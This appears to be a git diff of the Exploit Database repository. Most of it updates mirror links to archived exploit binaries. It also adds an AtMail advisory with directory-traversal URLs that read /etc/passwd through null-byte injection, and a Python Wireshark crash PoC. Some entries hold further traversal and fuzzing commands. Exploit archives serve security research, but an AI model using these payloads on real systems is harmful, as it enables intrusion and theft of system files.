https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_postgresqludf_sys_0.0.1.tar.gz +mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz) # milw0rm.com [2009-01-25] diff --git a/platforms/linux/local/7856.txt b/platforms/linux/local/7856.txt index d4386b4c9..8df13808f 100755 --- a/platforms/linux/local/7856.txt +++ b/platforms/linux/local/7856.txt @@ -3,6 +3,6 @@ MySQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz -mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz +mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz) # milw0rm.com [2009-01-25] diff --git a/platforms/linux/local/9191.txt b/platforms/linux/local/9191.txt index 2cd837399..1c9bb3a77 100755 --- a/platforms/linux/local/9191.txt +++ b/platforms/linux/local/9191.txt @@ -301,6 +301,6 @@ http://grsecurity.net/~spender/cheddar_bay.tgz -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-cheddar_bay.tgz +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9191.tgz (2009-cheddar_bay.tgz) # milw0rm.com [2009-07-17] diff --git a/platforms/linux/local/9208.txt b/platforms/linux/local/9208.txt index 116c758ea..bb63943ad 100755 --- a/platforms/linux/local/9208.txt +++ b/platforms/linux/local/9208.txt @@ -50,6 +50,6 @@ i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz GenuineIntel GNU/Linux ------------------------------------ -download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-pulseaudio-exp.tar.gz +download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz) # milw0rm.com [2009-07-20] diff --git a/platforms/linux/local/9435.txt b/platforms/linux/local/9435.txt index a761a11c1..eeea1df59 100755 --- a/platforms/linux/local/9435.txt +++ b/platforms/linux/local/9435.txt @@ -30,6 +30,6 @@ http://www.youtube.com/watch?v=arAfIp7YzZ4 */ http://www.grsecurity.net/~spender/wunderbar_emporium.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-wunderbar_emporium.tgz +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz (2009-wunderbar_emporium.tgz) # milw0rm.com [2009-08-14] diff --git a/platforms/linux/local/9436.txt b/platforms/linux/local/9436.txt index 7c4b9481b..14bb519b8 100755 --- a/platforms/linux/local/9436.txt +++ b/platforms/linux/local/9436.txt @@ -4,6 +4,6 @@ Quick and dirty exploit for this one: http://www.frasunek.com/proto_ops.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-proto_ops.tgz +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz (2009-proto_ops.tgz) # milw0rm.com [2009-08-14] diff --git a/platforms/linux/local/9574.txt b/platforms/linux/local/9574.txt index fdeca704a..9b379a38e 100755 --- a/platforms/linux/local/9574.txt +++ b/platforms/linux/local/9574.txt @@ -16,6 +16,6 @@ */ main: http://grsecurity.net/~spender/therebel.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-therebel.tgz +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz (2009-therebel.tgz) # milw0rm.com [2009-09-02] diff --git a/platforms/linux/local/9598.txt b/platforms/linux/local/9598.txt index 2d07df1d7..06067f66d 100755 --- a/platforms/linux/local/9598.txt +++ b/platforms/linux/local/9598.txt @@ -5,6 +5,6 @@ systems, it automatically searches in the SELinux policy rules for types with mmap_zero permission it can transition, and tries to exploit the system with that types. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage2.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9598.tar.gz (2009-linux-sendpage2.tar.gz) # milw0rm.com [2009-09-09] diff --git a/platforms/linux/local/9627.txt b/platforms/linux/local/9627.txt index 461732494..2451a8caa 100755 --- a/platforms/linux/local/9627.txt +++ b/platforms/linux/local/9627.txt @@ -37,6 +37,6 @@ */ http://www.grsecurity.net/~spender/enlightenment.tgz -back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-enlightenment.tgz +back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9627.tgz (2009-enlightenment.tgz) # milw0rm.com [2009-09-10] diff --git a/platforms/linux/local/9641.txt b/platforms/linux/local/9641.txt index e7831f908..c6690ea4d 100755 --- a/platforms/linux/local/9641.txt +++ b/platforms/linux/local/9641.txt @@ -4,6 +4,6 @@ pointer workaround for data items addressing on ppc64 (i.e. functions on exploit code and libc can be referenced); Improved search and transition to SELinux types with mmap_zero permission. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-linux-sendpage3.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9641.tar.gz (2009-linux-sendpage3.tar.gz) # milw0rm.com [2009-09-11] diff --git a/platforms/linux/remote/3021.txt b/platforms/linux/remote/3021.txt index a3171f4f5..756b172d6 100755 --- a/platforms/linux/remote/3021.txt +++ b/platforms/linux/remote/3021.txt @@ -2,6 +2,6 @@ # solareclipse at phreedom dot org # GPG key ID: E36B11B7 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12262006-proftpd-not-pro-enough.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) # milw0rm.com [2003-10-15] diff --git a/platforms/linux/remote/37007.txt b/platforms/linux/remote/37007.txt new file mode 100755 index 000000000..efb52435b --- /dev/null +++ b/platforms/linux/remote/37007.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52684/info + +AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input. + +An attacker can exploit these issues to obtain sensitive information, upload arbitrary code, and run it in the context of the webserver process. + +Atmail 1.04 is vulnerable; other versions may also be affected. + +https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././..././..././..././..././..././..././..././..././..././tmp/positive.test%00&Attachment[]=/../../../../../../../../../etc/passwd + +https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd + +https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html \ No newline at end of file diff --git a/platforms/linux/remote/5386.txt b/platforms/linux/remote/5386.txt index a6fd0b194..524a96b27 100755 --- a/platforms/linux/remote/5386.txt +++ b/platforms/linux/remote/5386.txt @@ -52,6 +52,6 @@ ** */ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-x2_fc6f7f8.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz) # milw0rm.com [2008-04-06] diff --git a/platforms/linux/remote/5720.py b/platforms/linux/remote/5720.py index 373982f7f..40849a844 100755 --- a/platforms/linux/remote/5720.py +++ b/platforms/linux/remote/5720.py @@ -17,7 +17,7 @@ # Autor: hitz - WarCat team (warcat.no-ip.org) # Collaborator: pretoriano # -# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2 +# 1. Download https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # 2. Extract it to a directory # diff --git a/platforms/linux/remote/609.txt b/platforms/linux/remote/609.txt index b4c96c234..95326c65f 100755 --- a/platforms/linux/remote/609.txt +++ b/platforms/linux/remote/609.txt @@ -1,4 +1,4 @@ Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ximage_zgv.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz) # milw0rm.com [2004-10-28] diff --git a/platforms/linux/remote/7701.txt b/platforms/linux/remote/7701.txt index 2fb8f2a00..8cf994aad 100755 --- a/platforms/linux/remote/7701.txt +++ b/platforms/linux/remote/7701.txt @@ -36,6 +36,6 @@ struct versions vers[VERSN] = {"Samba 3.0.x DEBUG",0x80380000,0x8045b000,30*1024} }; -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-lsa.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7701.zip (2009-lsa.zip) # milw0rm.com [2009-01-08] diff --git a/platforms/linux/webapps/30085.txt b/platforms/linux/webapps/30085.txt index c4eb3eaa0..84ee2ca28 100755 --- a/platforms/linux/webapps/30085.txt +++ b/platforms/linux/webapps/30085.txt @@ -8,7 +8,7 @@ # CVE : No CVE, no patch just 0Day # State : Critical -# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/zimbraexploit_rubina119.zip +# Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30085.zip (zimbraexploit_rubina119.zip) ---------------Description----------------- diff --git a/platforms/multiple/dos/10205.txt b/platforms/multiple/dos/10205.txt index a3c28b5d9..4eacf6ce7 100755 --- a/platforms/multiple/dos/10205.txt +++ b/platforms/multiple/dos/10205.txt @@ -168,4 +168,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-35451.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10205.zip (2009-11-22-35451.zip) \ No newline at end of file diff --git a/platforms/multiple/dos/11142.txt b/platforms/multiple/dos/11142.txt index 7a9793174..5d8a81961 100755 --- a/platforms/multiple/dos/11142.txt +++ b/platforms/multiple/dos/11142.txt @@ -45,4 +45,4 @@ Not Vulnerable: Firefox 3.5.3 on Windows crashed once but not reliably. PoC Packagetx: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE_ScaryMovie_Study.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip) diff --git a/platforms/multiple/dos/14268.txt b/platforms/multiple/dos/14268.txt index 6bd951309..f51d9a7da 100755 --- a/platforms/multiple/dos/14268.txt +++ b/platforms/multiple/dos/14268.txt @@ -69,7 +69,7 @@ Multi-Computer Virtual Whiteboard and so on. http://aluigi.org/poc/qtsslame.zip or -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/qtsslame.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14268.zip (qtsslame.zip) ####################################################################### diff --git a/platforms/multiple/dos/14761.txt b/platforms/multiple/dos/14761.txt index e13f30920..28d224d00 100755 --- a/platforms/multiple/dos/14761.txt +++ b/platforms/multiple/dos/14761.txt @@ -9,7 +9,7 @@ Website : http://www.itsecteam.com Forum : http://forum.ITSecTeam.com --------------------------------------------------------------------------- Advisory URL: http://itsecteam.com/en/papers/paper11.htm -POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adb_poc.zip +POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14761.zip (adb_poc.zip) --------------------------------------------------------------------------- System Affected: Adobe Acrobat reader 7.x diff --git a/platforms/multiple/dos/15086.py b/platforms/multiple/dos/15086.py index 422929b43..ea29c5488 100755 --- a/platforms/multiple/dos/15086.py +++ b/platforms/multiple/dos/15086.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15086.zip (moaub-23-exploit.zip) ''' ''' diff --git a/platforms/multiple/dos/15215.txt b/platforms/multiple/dos/15215.txt index 6cf08a5cb..a75b466c9 100755 --- a/platforms/multiple/dos/15215.txt +++ b/platforms/multiple/dos/15215.txt @@ -284,7 +284,7 @@ With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc. 0day remote ftpd Denial-of-Service: http://cxib.net/stuff/glob-0day.c -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/glob-0day.c +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15215.c (glob-0day.c) - --- 3. Fix --- Oracle 25.09.2010 CET: Being fixed in main codeline diff --git a/platforms/multiple/dos/15261.txt b/platforms/multiple/dos/15261.txt index 84d5a3ce1..86ce5f5ea 100755 --- a/platforms/multiple/dos/15261.txt +++ b/platforms/multiple/dos/15261.txt @@ -64,7 +64,7 @@ The effects of the problem can be: http://aluigi.org/poc/soliddb_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/soliddb_1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15261.zip ####################################################################### diff --git a/platforms/multiple/dos/15676.txt b/platforms/multiple/dos/15676.txt index 12f90d6f6..251a111a5 100755 --- a/platforms/multiple/dos/15676.txt +++ b/platforms/multiple/dos/15676.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow attackers to crash the application and deny serv This issue affects Wireshark 1.2.0 through 1.2.12 and 1.4.0 through 1.4.1. -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676_pcap.zip \ No newline at end of file +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15676-pcap.zip \ No newline at end of file diff --git a/platforms/multiple/dos/15707.txt b/platforms/multiple/dos/15707.txt index b814f7905..76f8b5fca 100755 --- a/platforms/multiple/dos/15707.txt +++ b/platforms/multiple/dos/15707.txt @@ -93,7 +93,7 @@ memory location: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/udpsz.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15707.zip (udpsz.zip) udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18 diff --git a/platforms/multiple/dos/15973.txt b/platforms/multiple/dos/15973.txt index 985267bbe..dfbdccc29 100755 --- a/platforms/multiple/dos/15973.txt +++ b/platforms/multiple/dos/15973.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the application to enter an infinite l Wireshark 1.4.0 to 1.4.1 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/44986.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15973.pcap (44986.pcap) \ No newline at end of file diff --git a/platforms/multiple/dos/1709.txt b/platforms/multiple/dos/1709.txt index e9f849b6e..3431d932e 100755 --- a/platforms/multiple/dos/1709.txt +++ b/platforms/multiple/dos/1709.txt @@ -18,5 +18,5 @@ Author: Luigi Auriemma ####################################################################### -Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04232006-openttdx.zip +Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1709.zip (04232006-openttdx.zip) diff --git a/platforms/multiple/dos/17201.php b/platforms/multiple/dos/17201.php index c1086c4b1..243eff648 100755 --- a/platforms/multiple/dos/17201.php +++ b/platforms/multiple/dos/17201.php @@ -46,4 +46,4 @@ $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar'); ?> -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/poc.phar.tar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17201.phar.tar (poc.phar.tar) \ No newline at end of file diff --git a/platforms/multiple/dos/1801.txt b/platforms/multiple/dos/1801.txt index 2ffec9394..7d0605780 100755 --- a/platforms/multiple/dos/1801.txt +++ b/platforms/multiple/dos/1801.txt @@ -1,5 +1,5 @@ # libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-libextho.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1801.zip (05172006-libextho.zip) # milw0rm.com [2006-05-17] diff --git a/platforms/multiple/dos/1820.txt b/platforms/multiple/dos/1820.txt index 93820547e..1ea60b232 100755 --- a/platforms/multiple/dos/1820.txt +++ b/platforms/multiple/dos/1820.txt @@ -1,5 +1,5 @@ # netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05232006-panza.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip) # milw0rm.com [2006-05-23] diff --git a/platforms/multiple/dos/2587.txt b/platforms/multiple/dos/2587.txt index eede8d41d..9480f6bb3 100755 --- a/platforms/multiple/dos/2587.txt +++ b/platforms/multiple/dos/2587.txt @@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl pucik[@]overflow.pl http://overflow.pl -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10172006-clam_petite_heap.exe.bz2 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 # milw0rm.com [2006-10-17] diff --git a/platforms/multiple/dos/2910.txt b/platforms/multiple/dos/2910.txt index 48fddcd61..d4a055de6 100755 --- a/platforms/multiple/dos/2910.txt +++ b/platforms/multiple/dos/2910.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM File Heap Overflow Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_chunkheap.chm +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2910.chm (12092006-sophos_chunkheap.chm) # milw0rm.com [2006-12-10] diff --git a/platforms/multiple/dos/2911.txt b/platforms/multiple/dos/2911.txt index 7753b231e..890a21ab7 100755 --- a/platforms/multiple/dos/2911.txt +++ b/platforms/multiple/dos/2911.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12092006-sophos_namelen.chm +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm) # milw0rm.com [2006-12-10] diff --git a/platforms/multiple/dos/2912.txt b/platforms/multiple/dos/2912.txt index fc71d8ea1..4c1d6a0f4 100755 --- a/platforms/multiple/dos/2912.txt +++ b/platforms/multiple/dos/2912.txt @@ -1,5 +1,5 @@ Multiple Vendor Antivirus RAR File Denial of Service Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12102006-sophos_intifiniti.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2912.rar (12102006-sophos_intifiniti.rar) # milw0rm.com [2006-12-10] diff --git a/platforms/multiple/dos/36840.py b/platforms/multiple/dos/36840.py new file mode 100755 index 000000000..4acce5b7b --- /dev/null +++ b/platforms/multiple/dos/36840.py @@ -0,0 +1,30 @@ +#!/usr/bin/python +# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC +# AUTHOR: Avinash Kumar Thapa "-Acid" +# Date of Testing: 26th April'2015 +# Vendor Homepage: http://www.wireshark.org +# Tested On : Windows 8.1 Pro +# Steps to Reproduce the Crash +# Step 1: Create a File Using PoC +# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer} +# Step 3: Click "Apply" +# Some other places for the Crash are: +# Statistics > IP Statistics then any of the field you can use. +# Statistics > Packet Length > Paste the buffer in the field +# Statistics > ANCP +# Statistics > Collectd +# Statistics > Compared +# Statistis > + + +buffer = "A"*80000 + +file = open("wireshark.txt","w") +file.write(buffer) +file.close() + +print "POC Created by -Acid" +print " Email: acid.exploit@gmail.com" + + + diff --git a/platforms/multiple/dos/4601.txt b/platforms/multiple/dos/4601.txt index 887aeb81c..eeebf5025 100755 --- a/platforms/multiple/dos/4601.txt +++ b/platforms/multiple/dos/4601.txt @@ -1,6 +1,6 @@ Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit Author: RoMaNSoFt -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11022007-DoS-CVE-2007-5365.tgz +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz) # milw0rm.com [2007-11-02] diff --git a/platforms/multiple/dos/5229.txt b/platforms/multiple/dos/5229.txt index d493ee34e..15c47b8b7 100755 --- a/platforms/multiple/dos/5229.txt +++ b/platforms/multiple/dos/5229.txt @@ -112,7 +112,7 @@ to write to the log file (max 1023 bytes) in a buffer of only 500. http://aluigi.org/poc/asgulo.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-asgulo.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5229.zip (2008-asgulo.zip) A] http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini diff --git a/platforms/multiple/dos/6029.txt b/platforms/multiple/dos/6029.txt index 3efbb1b2b..0a1b0a8f5 100755 --- a/platforms/multiple/dos/6029.txt +++ b/platforms/multiple/dos/6029.txt @@ -12,6 +12,6 @@ Microsoft Visio on windows: unaffected It is unknown at this time whether code execution is possible... """ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-www.NoiseBridge.net.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6029.zip (2008-www.NoiseBridge.net.zip) # milw0rm.com [2008-07-08] diff --git a/platforms/multiple/dos/6174.txt b/platforms/multiple/dos/6174.txt index 5896fb4e2..17d1d58d9 100755 --- a/platforms/multiple/dos/6174.txt +++ b/platforms/multiple/dos/6174.txt @@ -17,6 +17,6 @@ your scanner hanging, woops. -- kokanin -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snot.zip.bla +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6174.zip (2008-snot.zip.bla) # milw0rm.com [2008-07-31] diff --git a/platforms/multiple/dos/6237.txt b/platforms/multiple/dos/6237.txt index 7f9996b07..882192214 100755 --- a/platforms/multiple/dos/6237.txt +++ b/platforms/multiple/dos/6237.txt @@ -1,5 +1,5 @@ NULL pointer in Ventrilo 3.0.2 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ventrilobotomy.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6237.zip (2008-ventrilobotomy.zip) # milw0rm.com [2008-08-13] diff --git a/platforms/multiple/dos/6252.txt b/platforms/multiple/dos/6252.txt index c65f4d3b6..5e0de4ebe 100755 --- a/platforms/multiple/dos/6252.txt +++ b/platforms/multiple/dos/6252.txt @@ -56,7 +56,7 @@ Credit : g_ (g_ # orange-bat # com) http://www.orange-bat.com/adv/2008/vlc.dos.tta -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-vlc.dos.tta +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6252.tta (2008-vlc.dos.tta) - - PGP - diff --git a/platforms/multiple/dos/6622.txt b/platforms/multiple/dos/6622.txt index 79cf49d55..d11abd759 100755 --- a/platforms/multiple/dos/6622.txt +++ b/platforms/multiple/dos/6622.txt @@ -8,6 +8,6 @@ with a malformed Tamosoft CommView .ncf packet capture: Err file wtap.c: line 620 (wtap_read): assertion failed: (wth->phdr.pkt_encap != WTAP_ENCAP_PER_PACKET) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-wireshark.ncf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6622.ncf (2008-wireshark.ncf) # milw0rm.com [2008-09-29] diff --git a/platforms/multiple/dos/8285.txt b/platforms/multiple/dos/8285.txt index 708ba493a..95c52f6c0 100755 --- a/platforms/multiple/dos/8285.txt +++ b/platforms/multiple/dos/8285.txt @@ -2,6 +2,6 @@ // k`sOSe - works both in windows and linux -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-ffox-poc.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8285.tar.gz (2009-ffox-poc.tar.gz) # milw0rm.com [2009-03-25] diff --git a/platforms/multiple/dos/8826.txt b/platforms/multiple/dos/8826.txt index 3cc17d662..efab24e84 100755 --- a/platforms/multiple/dos/8826.txt +++ b/platforms/multiple/dos/8826.txt @@ -1,5 +1,5 @@ Acrobat <= 9.1.1 Stack Overflow Crashy PoC -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-crashy_the_clown.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8826.pdf (2009-crashy_the_clown.pdf) # milw0rm.com [2009-05-29] diff --git a/platforms/multiple/local/10207.txt b/platforms/multiple/local/10207.txt index 12abbf382..1c55117c4 100755 --- a/platforms/multiple/local/10207.txt +++ b/platforms/multiple/local/10207.txt @@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401 VMWare ESX Server 3.5 ESX350-200910401 VMWare ACE 2.5.3 Build 185404 -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-vmware86.tar.gz \ No newline at end of file +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz) \ No newline at end of file diff --git a/platforms/multiple/local/10326.txt b/platforms/multiple/local/10326.txt index ffd946871..6ee461b8c 100755 --- a/platforms/multiple/local/10326.txt +++ b/platforms/multiple/local/10326.txt @@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56 Ghostscript Ghostscript 8.54 Ghostscript Ghostscript 8.15 -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34340.ps \ No newline at end of file +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps) \ No newline at end of file diff --git a/platforms/multiple/local/10327.txt b/platforms/multiple/local/10327.txt index c6a62b63b..91c3049bc 100755 --- a/platforms/multiple/local/10327.txt +++ b/platforms/multiple/local/10327.txt @@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0 Avaya Intuity AUDIX LX 1.0 Avaya Intuity AUDIX -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-12-05-34337.pdf +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10327.pdf (2009-12-05-34337.pdf) diff --git a/platforms/multiple/remote/13787.txt b/platforms/multiple/remote/13787.txt index 4d65b6890..d72acf86c 100755 --- a/platforms/multiple/remote/13787.txt +++ b/platforms/multiple/remote/13787.txt @@ -9,6 +9,6 @@ NOTE: This was taken out of live malware and was not modified. BEWARE. By visiting the following link, you agree that you are responsible for any damages that occur. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/adobe-0day-2010-1297.tar.enc +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc) diff --git a/platforms/multiple/remote/1791.patch b/platforms/multiple/remote/1791.patch index c7d555aa6..3cd922e9a 100755 --- a/platforms/multiple/remote/1791.patch +++ b/platforms/multiple/remote/1791.patch @@ -15,6 +15,6 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx os->flush(); vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); } -Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05162006-BL4CK-vncviewer-authbypass.rar +Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) diff --git a/platforms/multiple/remote/1799.txt b/platforms/multiple/remote/1799.txt index fd8247ec9..638c9dc5a 100755 --- a/platforms/multiple/remote/1799.txt +++ b/platforms/multiple/remote/1799.txt @@ -1,8 +1,8 @@ class101 - http://heapoverflow.com RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners --------------------------------------------------------------------- -windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-win32.rar -linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05172006-VNC_bypauth-linux.tar.gz +windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) +linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) comments: http://heapoverflow.com/viewtopic.php?p=1729 --------------------------------------------------------------------- diff --git a/platforms/multiple/remote/18619.txt b/platforms/multiple/remote/18619.txt index 5d926b389..52ced8f7b 100755 --- a/platforms/multiple/remote/18619.txt +++ b/platforms/multiple/remote/18619.txt @@ -25,4 +25,4 @@ Enjoy :> /Kingcope -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/tomcat-remote.zip \ No newline at end of file 